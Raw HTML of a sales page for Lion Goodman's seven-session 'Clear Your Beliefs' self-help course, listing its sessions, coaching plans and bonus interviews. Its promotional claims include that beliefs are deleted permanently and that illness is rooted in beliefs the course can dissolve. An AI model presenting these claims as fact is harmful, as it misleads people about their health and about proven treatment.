<em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" 